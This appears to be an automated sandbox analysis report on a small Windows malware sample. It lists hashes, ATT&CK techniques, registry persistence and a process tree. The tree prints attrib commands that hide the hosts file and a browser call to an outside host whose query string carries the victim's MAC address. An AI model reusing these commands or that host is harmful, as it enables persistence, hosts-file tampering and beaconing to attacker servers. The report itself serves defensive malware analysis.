6e485450fc61f207c939d015bd1f8c3ccf1b47fce3260ff4bb1429e73dc45e74

Analysis

max time kernel
149s
max time network
120s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
22/08/2024, 15:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
Size

47KB
MD5

b8331a9c64d935f06e14428ab932aea8
SHA1

7cb4185baef0ba200940a35866204499a0ef2e46
SHA256

6e485450fc61f207c939d015bd1f8c3ccf1b47fce3260ff4bb1429e73dc45e74
SHA512

c6339938bd92311019671bab88094de8534b021d455d22c9e41d27f7e4a7a5cb55e6a7b1d567bf84bbe08a616e2479dc5119346c82c4894ff5bce564ca7f16cb
SSDEEP

768:je8MVvp3w/aCA5LzhMAObNZIWtuTgEROb7Or3LCUi/v9JTPZgHntYqq4DiwoR51Y:a8MVvp3w/FuOAOxRtKgEob7Or3di39Nk

Score

8^/10

discovery evasion persistence

Malware Config

Signatures

Adds policy Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\qq = "C:\\Users\\Admin\\AppData\\Local\\Temp\\b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe"	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
2140	attrib.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\win.ini	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe

System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EE9ABE11-609C-11EF-B8B4-D6FE44FD4752} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003e1c4d4a7885794291b78de8e6dfadfd000000000200000000001066000000010000200000001fad35c677f21331cd811e807e11461fbf36ac2f04e5be175172dd7cd4de916c000000000e80000000020000200000009a99dbd4079ec0fa76d00f696546af6a7938ab195ba75a11597ffeacdf4539e99000000064d9a492bb5ebd4bce1e80723e74eb7dee7aa8a2290a33e0412bbc0a2124b0fcc3fe2d66117c84a4fc251a9821f52736417143cb9cace95b2ba5c08836dd86c19edc4647cc950e858cfc7b0e59689859683f1ceabdcef6094fe2cf32c8e626078dfd1a0ef73cdf2ab8ec2040c0569e689df9028160bf073c2e1c48d5f7d6e682f917cb5d70c2a2b8cf7fb6fab07b743a4000000024c35dba0e7ce679e152043b4b8df4ddaa218fee05ea1e4d252b276264905b378f739fff2925f229d4a7a9d8c4f64a40d7e92efbd005158a8d71bff5d5e7b01f	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "430503128"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003e1c4d4a7885794291b78de8e6dfadfd000000000200000000001066000000010000200000005f9d961058f09aa19348f6b1b3413836f1ff998e8ade3aea0bb47e93b0634f09000000000e8000000002000020000000603b272a59156fef70d132df74c921664a90a91f506beeb597f71964af33d29320000000c0d58034ca0dc899f1e7edb37a85acab1cf6804a912554b34adbcbf6490f33cd400000003e13f5d952a8853cd2daa78dc523e2b33e48b4a83d1dbc31760533a94ee931e84ea619bb5056add35208c1fdf6ddba653b7d31c84ec47d26c29c721ac4458c6b	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f04fe3c5a9f4da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-940600906-3464502421-4240639183-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
Token: 33	348	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	348	AUDIODG.EXE
Token: 33	348	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	348	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2432	iexplore.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2432	iexplore.exe
2432	iexplore.exe
2900	IEXPLORE.EXE
2900	IEXPLORE.EXE
2900	IEXPLORE.EXE
2900	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 2808 wrote to memory of 2692	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	29
PID 2808 wrote to memory of 2692	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	29
PID 2808 wrote to memory of 2692	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	29
PID 2808 wrote to memory of 2692	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	29
PID 2808 wrote to memory of 2140	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	31
PID 2808 wrote to memory of 2140	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	31
PID 2808 wrote to memory of 2140	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	31
PID 2808 wrote to memory of 2140	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	31
PID 2808 wrote to memory of 2432	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	33
PID 2808 wrote to memory of 2432	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	33
PID 2808 wrote to memory of 2432	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	33
PID 2808 wrote to memory of 2432	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	33
PID 2432 wrote to memory of 2900	2432	iexplore.exe	34
PID 2432 wrote to memory of 2900	2432	iexplore.exe	34
PID 2432 wrote to memory of 2900	2432	iexplore.exe	34
PID 2432 wrote to memory of 2900	2432	iexplore.exe	34
PID 2808 wrote to memory of 1248	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	21
PID 2808 wrote to memory of 1248	2808	b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe	21

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2692	attrib.exe
2140	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1248
- C:\Users\Admin\AppData\Local\Temp\b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe
  "C:\Users\Admin\AppData\Local\Temp\b8331a9c64d935f06e14428ab932aea8_JaffaCakes118.exe"
  2⤵
  - Adds policy Run key to start application
  - Drops file in Drivers directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2808
- - C:\Windows\SysWOW64\attrib.exe
    attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
    3⤵
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2692
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:2140
- - C:\program files\internet explorer\iexplore.exe
    "C:\program files\internet explorer\iexplore.exe" "http://2009ylm.cn/union/install.asp?ver=090204&tgid=8888&address=D6-FE-44-FD-47-52&regk=1&flag=189a0de8155110795f4b6ad010af5c38&frandom=6637"
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2432
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2432 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2900

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x554
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9c1ae1e3be2978eddac99eb42e3b13be

SHA1
444acbcf1fddfa35e1fe7d73075d5b7dee925edc

SHA256
c35dfa5a3ef014251391cd3b0d96533c68379bc7bc1d677f1c124904779f7897

SHA512
5cfaddb05768290dbe681e652d2af157d6dce71fbc1d337b3d350d2994bd1437ef38cd9b95af05059d413cbc6906e36f0d21422cb81e280c3397e755f99d15c0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
efacddf046ea5b972174b0443d4d79b7

SHA1
dca5e7108e659703d40fea41ebec85ec36cd5f40

SHA256
62da09432b9c4488798355786dce1dbc7fec0aa2ce33f14105396c810bf79c81

SHA512
385fc4a6e6ee2e2591a67a20d63084c182c6b8674b316e61cbeb039d1e9473e6d8f92503cc14aa8ba58c5e67718b657fdbda7e47a1230122538835b57c524bdf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c68afda97f618ec3dc972bb8496326db

SHA1
b15159f649037771f117fb2e87befaf429dbb879

SHA256
cf8fcbcae47c2e167f990156531982902db91c55efa9a6acf6fa7918f6032a2f

SHA512
2fde704c0509912a3bc7969f6803525b3cd16d2e67533ca304624b4c32fb7b1e3ab0d069455a83c6a901bca125e2d9fe5fd8619e374b7ccca07ddd75934130e0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
04ba81eb58fad77fe30e0bb0d594235f

SHA1
0140866ddf373926a180ea41010b9e6e6f4022db

SHA256
282786a6caec922ba0d1700ca8e40eca83d05b696bf4389f559220555aa949b0

SHA512
e6cd8eda1f844732ae892a94f8f1effd434c3e8e8942893f67b10da07805a35a553584b407ab97a09e18b5a8ebaf3f6e9e03cd7f7f1cfe7a6c504608ca5c3cf1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
7bec5b789933f009a6a40d74b84a6f3c

SHA1
1c06a374ccb1904a76390d46929638cc3c272124

SHA256
fbc46523a6b6766c2603f586fd39757ab74bc4a18d0d81bd53416ab581616db3

SHA512
73b86f6a6fb463584f254be2c4dfb9d6b5cb375e6d62e5b956351b06ec79eeb14ad796fc0fdc1d6cba0fa3a9b83f3999697b3899d5696e66c4528d04574b1c29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1c1904b6f08bf4a9ee171572a2e71a19

SHA1
711b37d17cd8ff87c8a7cac4ee5a24ca41d5ad94

SHA256
a636bda179eb452c5f89b9798da3aeefdfab2045471ae6731095058e23fe74a5

SHA512
a9c1e1c3d8c20a91f0e28681fe59611346ec809b24cce549a6f288f09d989098e9d98dcdea195c6cc906bc75794fd954b0cdbe2f6e898bdc3f9dc2cbe61f3a4e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a3b2dcc9129da4ca24fe5d36de9fe7f2

SHA1
3ffafd4a6eb7821afa661affedde85bb035753cc

SHA256
26bffbeb58d7514caea4b03a6d60e7e2b5790a0be21130ea21a55b19b82a2160

SHA512
de6b9e81418b7e7e89cb456f470744fd621190bc37be026cb0321126f9d08e8e953eca9e2367434a78d81e7f6522e43f3aceff17adf6238ea926ef766c0c3603

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d9ceb1884fb8c774c2bf9ad8a916d178

SHA1
53840722cc07129b370f5065dc8e244629c43ad1

SHA256
0537af03a342809baf1da435aa5695f7c673f7e6718f409816bc76e4405aaca6

SHA512
945c0b5d87f10b24cd7c06e4fd0e4fbd53a34c4d3cb81215d0a034d5c0772fbee00a9432629a6b3df883d3b89c226d8237f0ca58c93ce00fe6ee83f9a59138da

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
077c02248095e9510722ecfc9570f1a0

SHA1
1f57b030cb8a4dd11af21b42ca343d8733e68c5d

SHA256
8d13c029ce8047b42b515057d2bf738b6c5e812434e2e0576b41369288164606

SHA512
df6cbcfa3ab1d766fbdcfb1ca17aaf45f0f86ab756307030d237340fabdeef7cbb506561e2c5914ae1d2c802a3a5e535b3deb6e117ea763f030e528146d1af9a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
2c0775a7b4fc39049b56251e1e704ae0

SHA1
2dc15ebbb7258d1cf0ed5f7997c1b7bec8035f78

SHA256
